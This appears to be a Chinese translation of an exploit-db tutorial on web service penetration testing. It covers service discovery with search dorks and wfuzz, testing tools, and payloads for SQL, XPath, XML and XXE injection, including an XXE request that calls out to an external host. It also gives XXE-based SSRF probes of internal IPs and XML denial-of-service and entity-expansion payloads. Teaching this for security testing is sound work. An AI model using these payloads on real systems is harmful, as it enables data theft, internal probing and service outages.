ref:Web Service 渗透测试从入门到精通

ref:https://www.anquanke.com/post/id/85910php

Web Service 渗透测试从入门到精通

发布时间:2017-04-18 14:26:54css

译文声明:本文是翻译文章,文章原做者,文章来源:exploit-db.com 原文地址:https://www.exploit-db.com/docs/41888.pdf

译文仅供参考,具体内容表达以及含义原文为准git

http://p2.qhimg.com/t011ac0119cb326842e.jpg

 

翻译:興趣使然的小胃github

1、Web Service的含义及使用范围web

Web Service覆盖的范围很是普遍,在桌面主机、Web、移动设备等领域均可以见到它的身影。任何软件均可以使用Web Service,经过HTTP协议对外提供服务。sql

在Web Service中,客户端经过网络向服务器发起请求,Web服务器按照适当的格式(好比JSON、XML等)返回应答数据,应答数据由客户端提供给最终的用户。数据库

说起Web Service时,咱们首先须要解释如下概念:apache

SOAP(Simple Object Access Protocol,简单对象访问协议)型Web Service。SOAP型的Web Service容许咱们使用XML格式与服务器进行通讯。api

REST(Representational State Transfer,表征性状态转移)型Web Service。REST型Web Service容许咱们使用JSON格式(也可使用XML格式)与服务器进行通讯。与HTTP相似,该类型服务支持GET、POST、PUT、DELETE方法。安全

WSDL(Web Services Description Language,网络服务描述语言)给出了SOAP型Web Service的基本定义,WSDL基于XML语言,描述了与服务交互的基本元素,好比函数、数据类型、功能等,少数状况下,WSDL也能够用来描述REST型Web Service。

WADL(Web Application Description Language,网络应用描述语言)就像是WSDL的REST版,通常用于REST型Web Service,描述与Web Service进行交互的基本元素。

 

2、为何写这篇文章

BGA团队专一于对机构、组织开放的Web应用、外部IP地址以及Web Service进行安全测试。

在渗透测试中,咱们看到Web Service的应用范围愈来愈多广,但人们在使用Web Service时,并无特别关注安全问题。出于这个缘由,人们部署的Web Service中常常会出现重大安全漏洞。

咱们将在本文中讨论Web Service渗透测试工做中常常遇到的技术和逻辑相关问题。

 

3、如何发现Web Service

咱们可使用如下方式发现Web Service:

一、使用代理软件,检查所捕获的数据。

二、经过搜索引擎探测Web应用程序暴露的接口(好比目录遍历漏洞、lfi(本地文件包含)等)。

三、爬取并解压swf、jar等相似文件。

四、模糊测试。

可根据实际状况选择所使用的具体方法。

举个例子,咱们可使用swf intruder工具,反编译某个.swf文件,从中挖掘Web Service的WSDL地址,以下图所示:

http://p3.qhimg.com/t01e82fa20fb82802c1.png

代理软件能够用来探测应用程序所使用的Web Service。

下图是在BurpSuite中设定的过滤规则,用来筛选抓包数据中的Web Service地址。咱们能够经过搜索与表达式相匹配的数据,探测诸如“.dll?wsdl”、“.ashx?wsdl”、“.exe?wsdl”或者“.php?wsdl”等等的Web Service地址。

http://p9.qhimg.com/t01165722afc9fa68f7.png

探测Web Service的另外一种方法是使用搜索引擎,好比Google。好比,咱们能够经过如下搜索语句在Google中找到Web Service:

Search string: filetype:asmx inurl:(_vti_bin | api | webservice | ws )

http://p8.qhimg.com/t01dd48f4cf5ae593ad.png

Search string: allinurl:dll?wsdl filetype:dll

http://p7.qhimg.com/t015e6781a26b30073c.png

对于Bing搜索引擎,咱们可使用如下语句查找Web Service:

asmx?wsdl site:us

http://p4.qhimg.com/t01c018685533881f3c.png

咱们也可使用Wfuzz工具,查找Web Service,命令以下:

 

wfuzz -p 127.0.0.1:8080 -c --hc 404,XXX -z list,ws-webservice-webservisler -z file,../general/common.txt -z file,ws-files.txt http://webservices.example.com/FUZZ/FUZ2ZFUZ3Z

咱们能够经过“-p”参数,同时使用多个代理,以达到负载均衡。最后使用的代理服务器地址将会在tor网络中使用。

-p IP:port-IP:port-IP:8088

http://p0.qhimg.com/t0173f4909e9377a247.png

经过查看HTTP响应状态代码,从各个方面分析响应报文,咱们能够找到正确的服务地址。根据上图结果,咱们找到的Web Service以下图所示:

http://p2.qhimg.com/t0156c38cd9ce8abc78.png

“wsdl”地址有时候能够是“.wsdl”,不必定都是“?Wsdl”形式。咱们在搜索时要注意到这一点。好比,咱们能够经过以下搜索语句,探测Web Service:

filetype:wsdl

http://p2.qhimg.com/t01fa5f08080955e631.png

 

4、Web Service中的渗透测试工具

咱们能够操纵Web Service方法的具体参数,挖掘其中存在的各类技术和逻辑漏洞。咱们可使用如下专业工具对常见的Web Service进行渗透测试。

好比,咱们能够下载OWASP Zed Attack Proxy的SOAP Scanner插件,对SOAP型Web Service进行测试。

http://p0.qhimg.com/t0122a37a907564c82b.png

指定URL或WSDL地址,咱们能够载入与Web Service相关的一些方法。

http://p5.qhimg.com/t012bd9c9600739c597.png

以下图所示,咱们能够看到与Web Service有关的全部方法。

http://p2.qhimg.com/t010ccb95eb49b53c15.png

例如,某个Web Service请求以下所示:

http://p2.qhimg.com/t0141d5985c40be237a.png

对应的响应以下所示:

http://p4.qhimg.com/t0193762d340328667b.png

此外,咱们还可使用Firefox的RESTClient插件对REST型的Web Service进行测试。经过RESTClient插件,咱们可使用POST和GET方法来查询目标系统相关信息。咱们也可使用插件中的Basic Auth或自定义头部等等其余附加功能。以下所示:

http://p9.qhimg.com/t018c10fdf11a2f290a.png

简单汇总一下,咱们可使用如下工具对Web Service进行渗透测试。

WebScarap

SoapUI

WCFStorm

SOA Cleaner

WSDigger

wsScanner

Wfuzz

RESTClient

BurpSuite

WS-Attacker

ZAP

Metasploit

WSDL Analyzer

咱们能够合理搭配使用SoapUI以及BurpSuite这两个工具,以得到很是完美的渗透测试结果。

与BurpSuite同样,SoapUI工具能够做为代理使用,这也是这两款工具在渗透测试中常用的缘由所在。

如今,举个具体例子,说明咱们如何经过SoapUI访问Web Service,并将请求转发给BurpSuite。

首先启动SoapUI软件,建立一个新的SOAP工程。在“Initial WSDL”一栏填入WSDL地址(本例中,咱们可使用“http://zero.webappsecurity.com/webservices/infoService?wsdl”这个地址,该Web Service存在漏洞)。

http://p4.qhimg.com/t01c97bc96932e750dd.png

以下图所示,咱们已经成功导入Web Service。SoapUI对给定的WSDL地址进行解析,以建立Web Service函数及请求。

http://p6.qhimg.com/t01da153e82d4880844.png

点击“File->Preferences”菜单,打开“Proxy Settings”,指向BurpSuite的地址,以下所示:

http://p6.qhimg.com/t01ff6594e6603a3026.png

若是后续请求中涉及函数列表中的任意函数,BurpSuite能够成功捕获这些请求。

http://p5.qhimg.com/t0132352167bc306f5f.png

 

5、Web Service渗透测试中可能会发现的漏洞

在这一部分,咱们将讨论在Web Service渗透测试中可能会发现的漏洞。

若是咱们已知某个Web应用漏洞,且该漏洞在Web Service渗透测试中可能存在,那么咱们应该在测试流程中将其考虑在内。

好比,在Web应用程序中存在的“用户枚举(User Enumeration)”漏洞或“全路径泄露(Full Path Disclosure)”漏洞也可能在Web Service中存在。

5.1 Web Service中的注入漏洞

5.1.1 SQL注入漏洞

Web Service中的SQL注入(SQLi)漏洞与普通Web渗透测试中漏洞并没有区别。

咱们须要仔细检查Web Service中全部函数的全部参数,检查它们是否受到SQLi漏洞影响。

咱们以“http://www.thomas-bayer.com/sqlrest/”这个RESTful Web Service为例,分析该服务存在的SQLi漏洞。咱们使用Firefox中的RESTClient插件检测SQLi漏洞。

咱们的目标是“http://www.thomas-bayer.com/sqlrest/CUSTOMER/$id”中的id参数,咱们能够构造某些SQLi载荷,发往该地址,解析返回的结果。

http://p5.qhimg.com/t01b77d67ebfae7fe19.png

正常的id值为23,咱们使用的测试载荷为:

23 AND 1=1

测试地址为:

http://www.thomas-bayer.com/sqlrest/CUSTOMER/23%20AND%201=1/

返回结果为:

http://p4.qhimg.com/t011711c43dbb15c7bc.png

咱们没有看到任何错误页面,貌似SQL服务器正确处理了这个请求逻辑。

更换测试载荷,以下所示。

23 AND 1=0

测试地址为:

http://www.thomas-bayer.com/sqlrest/CUSTOMER/23%20AND%201=0

返回结果为:

http://p8.qhimg.com/t0198599da3dc7a3d8f.png

若是载荷不知足SQL查询条件,服务器会返回404响应报文。

咱们发送以下载荷,并最终得到了服务器上的全部用户名。

23 OR 1=1

测试地址:

http://www.thomas-bayer.com/sqlrest/CUSTOMER/23%20OR%201=1

包含用户名的服务器响应以下:

http://p4.qhimg.com/t01451589382594f953.png

咱们能够经过这种方法,手动检查SQLi漏洞。咱们能够先向目标系统发送一段简单载荷,检查响应内容,肯定Web Service对应的函数是否存在SQLi漏洞。

5.1.2 XPath注入漏洞

XPath是服务端查询以XML格式存储的数据时所使用的查询语言。

string(//user[username/text()='bga' and password/text()='bga']/account/text())

例如,对于上述查询语句,若是发送的测试载荷为“1 'and' 1 '=' 1 and 1 'and' 1 '=' 2”,那么通过逻辑处理后,返回的响应为“TRUE”,不然,返回的响应为“FALSE”。

咱们以“https://github.com/snoopythesecuritydog/dvws/”为例,分析该应用存在的XPATH注入漏洞。

开发者使用的应该是PHP语言,以下所示:

http://p8.qhimg.com/t0182e25f72273acd70.png

代码中读取的“accountinfo.xml”文件内容以下所示:

http://p6.qhimg.com/t01dc49128cb799a2f9.png

当咱们试图使用“bga:1234”凭证登录该页面时,咱们看到以下的错误信息:

http://p4.qhimg.com/t014e0d8fd711c3509c.png

然而,咱们可使用“1' or '1' = '1”做为用户及密码的输入载荷,发现该页面存在XPATH注入漏洞:

http://p0.qhimg.com/t017b5fc86ab7a2654c.png

5.1.3 XML注入漏洞

XML是一种数据存储格式,若是服务器在修改或查询时没有进行转义处理,直接输入或输出数据,将会致使XML注入漏洞。攻击者能够篡改XML数据格式,增长新的XML节点,对服务端数据处理流程形成影响。

 

Input: 2
<product> <name>Computer</name> <count>2</count> <price>200$</price> </product>

上述XML中,咱们能够在服务器应答包中的“count”节点找到请求中的输入值。

若是咱们修改输入值,那么咱们能够看到返回结果中,“price”节点的值已经被成功篡改。

 

Input: 2</count><price>0$</price></product> <product> <name>Computer</name> <count>2</count><price>0$</price></product> ...

5.1.4 XXE注入漏洞

XXE(XML External Entiry Injection,XML外部实体注入)漏洞是在对非安全的外部实体数据进行处理时所引起的安全问题。实体是XML文档结构中定义的一个概念,能够经过预约义在文档中调用。利用XML提供的实体特性,攻击者可使用XXE漏洞读取本地文件。

XXE注入漏洞中,发往服务器的XML载荷以下所示:

 

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

咱们以 “QIWI.ru”网站的SOAP型Web Service为例,分析其中的XXE漏洞(该漏洞由某位安全研究人员发现,具体研究报告能够参考此处资料)。

攻击者发往“https://send.qiwi.ru/soapserver”地址的载荷为:

 

POST /soapserver/ HTTP/1.1
Host: send.qiwi.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 254
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "https://bitquark.co.uk/?xxe">]> <SOAP-ENV:Envelope> <SOAP-ENV:Body> <getStatus> <id>&xxe;</id> </getStatus> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

关于XXE漏洞的更多信息,读者能够参考这里的相关资料。

5.2 Web Service中的控制问题

5.2.1 未受权访问冲突

当咱们统计渗透测试的结果时,咱们会发现未受权访问漏洞在Web Service中很是常见。主要的缘由在于开发人员不认为未受权用户是攻击者,且理所固然认为Web Service是一个足够安全的环境。

为了不这类漏洞存在,发往服务器的请求中必须包含令牌值或令牌信息(如用户名及密码信息)。

此外,与Web Service有关的全部函数都应该要求请求报文中包含用户会话信息。

5.2.2 未限制函数使用范围

Web Service中常见的一个问题就是不对函数的使用范围进行限制。这会致使如下问题存在:

一、暴力破解攻击

二、填充篡改数据库

三、滥用服务器赋予用户的权限

四、消耗服务器资源形成DDoS攻击

5.3 Web Service中的业务逻辑漏洞

此类漏洞的存在缘由在于Web应用缺少标准,每一个开发人员所开发的Web应用各不相同。

所以,这是个漫长且无止境的话题。咱们能够经过几个例子来稍加说明。

好比,咱们来研究一下Twitter的RESTful Web Service中存在的漏洞(具体细节能够参考这个报告)。

某个用户删除了Twitter上的一条私信(Direct Message,DM)。当他查看DM信息时,发现这条信息已再也不存在。然而,经过Twitter提供的REST命令行接口,咱们发现只要提供已删除DM的id,咱们就能够读取这条DM信息,然而根据业务处理流程,这条DM此时并不该该存在。

Web Service中常常存在的另外一类问题就是,在服务器的最终应答报文中,包含客户端先前请求报文中的某些信息,这种状况在手机或平板应用中常常存在。

开发者之因此将密码保存在设备本地中,就是但愿用户在每次登陆应用时,都向本地数据库发起查询,以免由于网络缘由致使登陆失败。

BGA团队对移动或平板应用渗透测试时,发现某个服务器的密码重置功能在返回给客户端的响应报文中包含密码信息,且该密码会被存储在设备本地中。

咱们对土耳其某个著名电子商务网站进行测试时,找到了移动和平板应用所使用的WSDL地址以及某个存在用户信息泄露的函数。经过该函数接口,客户端不只可以获取目标用户的邮件地址,甚至还能在响应消息中找到用户的密码信息。利用这种漏洞,攻击者能够窃取任何已知用户的凭证。

这种敏感信息不该该在Web Service的应答报文中存在。有时候虽然攻击者没法从攻击网站中获取任何信息,他们却能够借助移动或平板应用中Web Service漏洞,对整个系统形成危害。

5.4 Web Service中的会话重放漏洞

此类漏洞的存在缘由在于攻击者对同一网络上的用户实施MITM(中间人)攻击,从拦截的数据中嗅探用户会话信息。

不安全的协议(好比基于HTTP的Web Service广播)中会存在此类漏洞。Web Service能够为每一个用户提供一个会话ID(Session ID,SID)来规避这种漏洞,另外一种解决办法就是在容许用户登陆的全部发往服务器的请求中都捎带用户会话信息。

对于没有使用SSL的Web Service,若是会话的SID值被网络中的其余人获取,则可能会受到会话重放攻击影响。

5.5 Web Service中的SSRF漏洞

SSRF(Server-Side Request Forgery,服务端请求伪造)漏洞指的是攻击者经过在服务端建立伪造的请求,以间接方式执行那些没法从外部直接执行的操做。

例如,攻击者能够利用SSRF漏洞,探测服务器上某些没法从外部扫描发现的端口信息。此外,攻击者也能够利用SSRF漏洞读取服务器的本地文件、向另外一台服务器发起DDoS攻击、发起DNS查询请求等。

以“https://github.com/snoopythesecuritydog/dvws/”为例,咱们能够利用该地址中存在的XXE漏洞,向某些内部地址发起请求并对响应报文进行分析。

当咱们点击下图中的“Print Greeting”按钮时,咱们会收到服务器返回的一条信息。

http://p2.qhimg.com/t0171e4173815ef1439.png

经过BurpSuite,能够看到咱们往服务器发送了一个带有XML数据的请求。

http://p7.qhimg.com/t019b9370ea01cb77c8.png

咱们能够用XXE攻击载荷替换其中的XML数据,判断服务器网络中是否存在某台主机。

在以下的攻击载荷中,咱们使用了“192.168.1.10”地址,服务器本地网络中并不存在使用该IP地址的主机。咱们将攻击载荷发往存在SSRF漏洞的服务器。

 

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://192.168.1.10" >]><foo>&xxe;</foo>

由于没法访问此IP地址,服务器返回以下错误信息:

http://p7.qhimg.com/t019d8c4bdec6e3b19f.png

然而,若是咱们将载荷中的IP修改成“192.168.1.2”,服务器不会返回任何错误页面,代表服务器能够访问该IP地址。

 

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://192.168.1.2" >]><foo>&xxe;</foo>

http://p5.qhimg.com/t01bc1648b6b3f5445c.png

5.6 Web Service中的拒绝服务(DoS)漏洞

客户端发送的XML数据会由服务端的XML解析器进行解析和处理。目前有两类XML解析器,分别为基于SAX(Simple API for XML)的XML解析器以及基于DOM(Document Object Model)的XML解析器。

基于SAX的解析器在工做时,内存中最多容纳2个元素。在这种状况下,基于SAX的解析器不会存在拒绝服务问题。

基于DOM的解析器会一次性读取客户端存储的全部XML数据。所以会致使内存中存在庞大的对象数据。这种状况下,咱们难以免拒绝服务器攻击。致使这种漏洞存在的缘由在于咱们没有检查XML中节点的大小和数量。

例如,攻击者可使用以下载荷发起针对元素名称的攻击。

 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <TEST> <BGABGABGABGABGABGABGABGABGABGABGABGABGABGABGABGA………BGABGABGABGABGABGABGABGABGABGA> </TEST> </soapenv:Body> </soapenv:Envelope>

攻击者可使用以下载荷发起针对元素属性的攻击。

 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <TEST> <BGA attribute=”BGABGABGABGABGABGABGABGABGABGABGABGABGABGABGABGA………BGABGABGABGABGABGABGABGABGABGA”></BGA> </TEST> </soapenv:Body> </soapenv:Envelope>

攻击者可使用以下载荷发起针对元素个数的攻击(也能够经过重复某个特定元素达到一样效果)。

 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <TEST> <BGA attribute1=”BGABGABGABGABGABGABGABGABGABGABGABGABGABGABGABGA...BGABGABGABGABGABGABGABGABGABGA” attribute2=”BGABGABGABGABGABGABGABGABGABGABGABGABGABGABGABGA...BGABGABGABGABGABGABGABGABGABGA” attribute3=”BGABGABGABGABGABGABGABGABGABGABGABGABGABGABGABGA...BGABGABGABGABGABGABGABGABGABGA”></BGA> </TEST> </soapenv:Body> </soapenv:Envelope>

当XXE攻击奏效时,也能够引起服务拒绝漏洞。

攻击者可使用以下载荷发起DDoS攻击。

 

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE bga [ <!ELEMENT ANY > <!ENTITY bga1 "bga1"> <!ENTITY bga2 "&bga1;&bga1;&bga1;&bga1;&bga1;&bga1;"> <!ENTITY bga3 "&bga2;&bga2;&bga2;&bga2;&bga2;&bga2;"> <!ENTITY bga4 "&bga3;&bga3;&bga3;&bga3;&bga3;&bga3;"> <!ENTITY bga5 "&bga4;&bga4;&bga4;&bga4;&bga4;&bga4;"> <!ENTITY bga6 "&bga5;&bga5;&bga5;&bga5;&bga5;&bga5;"> ]> <bga>&bga6;</bga>

从载荷中可知,攻击者定义了一些XML实体,并在最后引用了bga6实体。bga6实体引用了6次bga5实体,一样,每一个bga5实体也引用了6次bga4实体,以此类推。

当发往服务端的载荷中这类实体的数量和引用次数很是巨大时,服务端的XML解析器负载将大大提升,致使服务器在一段时间内没法响应客户端请求,最终达到拒绝服务攻击效果。

本文翻译自 exploit-db.com,  原文连接 。如若转载请注明出处。
相关文章
相关标签/搜索